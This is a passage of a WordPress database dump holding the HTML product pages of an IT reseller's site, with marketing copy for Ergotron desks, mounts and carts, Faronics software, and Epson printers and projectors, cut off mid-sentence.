cost.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Fuji Xerox','','publish','closed','closed','','fujixerox','','','2019-09-30 14:33:41','2019-09-30 06:33:41','',0,'https://bintara.com.my/?page_id=1482',0,'page','',0),(1483,1,'2018-12-11 14:12:08','2018-12-11 06:12:08','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n  <h1>Standing Desks</h1>\r\n  Sit less. Stand more. Feel the difference.\r\n\r\n\r\n  <h3>1. WorkFit-Z Mini</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â WorkFit-TL, Standing Desk Workstation</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n        <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Presenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â WorkFit-S,Â Dual Workstation with Worksurface</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n        <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          This easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h1>Mounts</h1>\r\n  Improve your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n\r\n  <h3>1. LX Desk Monitor Arm</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â LX Dual Stacking Arm</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          Create a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â LX Wall Monitor Arm</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n        </td>\r\n        <td>\r\n          Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h2>Product Benefits</h2>\r\n  <ul>\r\n   	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n   	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n   	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n   	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n   	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n  </ul>\r\n\r\n  &nbsp;\r\n  <h1>Mobile Carts</h1>\r\n  Personalize an AV, computer or laptop cart to suit your workflow requirements.\r\n\r\n  &nbsp;\r\n  <h2>1. Mobile Workstations</h2>\r\n\r\n  &nbsp;\r\n  <h3>1. WorkFit-C, Single LD Sit-Stand Workstation</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          This computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â WorkFit-C, Dual Sit-Stand Workstation</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          This innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â Neo-FlexÂ® Laptop Cart</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          This secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h1>Medical Carts</h1>\r\n\r\n  &nbsp;\r\n  <h3>1.Â StyleViewÂ® Laptop Cart, SV40</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Incredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, Powered</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Expand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â StyleViewÂ® Telemedicine Cart, Powered</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          The modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          The ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  To discover more, please click the button below or contact us to discuss your needs.\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','Ergotron','','publish','closed','closed','','ergotron','','','2019-09-26 16:43:58','2019-09-26 08:43:58','',0,'https://bintara.com.my/?page_id=1483',0,'page','',0),(1484,1,'2018-12-11 14:13:04','2018-12-11 06:13:04','<div>\r\n<h2><strong>Faronics Product Solutions</strong></h2>\r\n\r\n&nbsp;\r\n<h3><strong>Deep Freeze</strong></h3>\r\nDeep Freeze makes workstation configurations indestructible. Guarantees 100% workstation recovery upon every restart.\r\n<h3><strong>Endpoint Management</strong></h3>\r\nComprehensive set of tools for deployment, management and monitoring usage of IT assets in your environment.\r\n<h3><strong>Security</strong></h3>\r\nSecurity solutions to enable your business to innovate, improve defences and reduce risk from toughest security threats.\r\n<h3><strong>Mobile</strong></h3>\r\nDetermine how mobile IT should be integrated with work processes and objectives in an enterprise environment.\r\n<h3><strong>Classroom Management</strong></h3>\r\nEffective classroom management tool that helps teachers create a better learning experience, while helping IT professionals manage multiple labs.\r\n\r\n&nbsp;\r\n<h2><strong>See what you can do with DF Cloud</strong></h2>\r\nItâ€™s the most complete set of enterprise solutions to protect, manage and optimize your IT assets, offered as a cloud suite.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div><iframe src=\"https://www.youtube.com/embed/UNGDSKuDWew\" width=\"817\" height=\"354\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>','Faronics','','publish','closed','closed','','faronics','','','2019-09-30 11:22:53','2019-09-30 03:22:53','',0,'https://bintara.com.my/?page_id=1484',0,'page','',0),(1486,1,'2018-12-11 14:11:18','2018-12-11 06:11:18','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" />\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /><br>\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider 